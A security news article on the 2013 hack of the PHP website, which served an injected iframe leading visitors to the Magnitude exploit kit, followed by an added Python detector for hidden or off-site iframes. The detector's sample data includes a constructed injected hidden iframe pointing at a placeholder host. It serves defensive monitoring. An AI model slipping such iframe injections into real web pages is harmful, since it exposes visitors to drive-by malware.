Official PHP website hacked, spreads malware infection

Graham Cluley

The official website of the open-source PHP programming language has been hacked and used to spread malware to visitors.

The first indication that many users will have had that anything was wrong was when Google’s Safe Browsing service began to pop up an alert indicating that the site was serving malicious scripts, as reported on Thursday by Softpedia.

Google Safe Browsing alert on the PHP website. Source: Softpedia

Initially, many people’s reaction was that the warning was likely to be a false positive. However, a statement on the PHP site has now confirmed that malware was spread from the site from Tuesday 22 October until the 24th.


PHP statement about malware infection

Part of the statement reads:

To summarise, the situation right now is that:

* JavaScript malware was served to a small percentage of users from the 22nd to the 24th of October 2013.
* Neither the source tarball downloads nor the Git repository were modified or compromised.
* Two servers were compromised, and have been removed from service. All services have been migrated to new, secure servers.
* SSL access to Web sites is temporarily unavailable until a new SSL certificate is issued and installed on the servers that need it.

Kaspersky security researcher Fabio Assolini confirmed the infection, saying that the attackers had injected a malicious iframe into the website. The iframe pointed to the Magnitude exploit kit, which in turn dropped the Tepfer Trojan horse onto visiting computers.

Exploit kits like Magnitude take advantage of unpatched vulnerabilities on visiting computers, exploiting security holes in software such as Adobe Flash, Java and the various web browsers. That is a major incentive to keep your patches up to date.
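The injection Assolini describes, a hidden iframe pulling in an exploit kit landing page, is the kind of change a site operator can watch for in the HTML the server actually sends, independently of what the source repository says. The script below is an added example, not code from the PHP project or from Kaspersky; it assumes a site hostname (`www.example.org`) and a constructed sample page, and flags any iframe that is hidden by size or style or whose `src` points away from the site’s own host.

```python
"""Flag iframes in served HTML that look like drive-by injections.

Added example; not php.net's or Kaspersky's code. Assumes the site's own
hostname is EXPECTED_HOST and that the sample pages below are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

EXPECTED_HOST = "www.example.org"  # assumption: the monitored site's hostname


class IframeCollector(HTMLParser):
    """Collects the attributes of every <iframe> start tag in a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "iframe":
            self.iframes.append({k.lower(): (v or "") for k, v in attrs})


def _is_tiny(value):
    """True for width/height values of 0 or 1 (with or without 'px')."""
    try:
        return int(value.strip().lower().rstrip("px").strip()) <= 1
    except ValueError:
        return False


def _is_hidden(attrs):
    """True if the iframe has near-zero size or is hidden by inline style."""
    if _is_tiny(attrs.get("width", "")) or _is_tiny(attrs.get("height", "")):
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    markers = ("display:none", "visibility:hidden", "width:0", "height:0")
    return any(m in style for m in markers)


def suspicious_iframes(html, expected_host=EXPECTED_HOST):
    """Return (src, reasons) for each iframe that is hidden or off-origin."""
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.iframes:
        src = attrs.get("src", "")
        # A relative src has no hostname and therefore stays on the site.
        host = urlparse(src).hostname or expected_host
        reasons = []
        if host != expected_host:
            reasons.append("off-origin src %s" % host)
        if _is_hidden(attrs):
            reasons.append("hidden geometry/style")
        if reasons:
            findings.append((src, reasons))
    return findings


# Constructed sample pages: a clean page and the same page with an injected
# 1x1, display:none iframe pointing at a placeholder off-site host.
CLEAN_PAGE = "<html><body><h1>Downloads</h1><p>Get the source.</p></body></html>"
INJECTED_PAGE = CLEAN_PAGE.replace(
    "</body>",
    '<iframe src="http://landing.invalid/kit" width="1" height="1" '
    'style="display:none"></iframe></body>',
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN_PAGE), ("injected", INJECTED_PAGE)):
        print(name, suspicious_iframes(page))
```

Running the scan over each page a server delivers (or over a periodic crawl of the site) gives a tripwire that fires on exactly the kind of change the statement describes, even when the Git repository and tarballs are untouched.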

This doesn’t, of course, explain how the website managed to become compromised in the first place. Clearly something went badly wrong if the hackers were able to inject their malicious script into the site, causing every visitor to be silently targeted by the Magnitude exploit kit.

Of course, PHP is a development language used behind-the-scenes by many millions of websites across the net. Fortunately, there is no indication that any of the code maintained on the site was compromised.

The site says it will publish a full post-mortem on the security incident in the near future, probably next week, and that users should follow @official_php on Twitter for updates.

Graham Cluley is a veteran of the cybersecurity industry, having worked for a number of security companies since the early 1990s when he wrote the first ever version of Dr Solomon's Anti-Virus Toolkit for Windows. Now an independent analyst, he regularly makes media appearances and is an international public speaker on the topic of cybersecurity, hackers, and online privacy.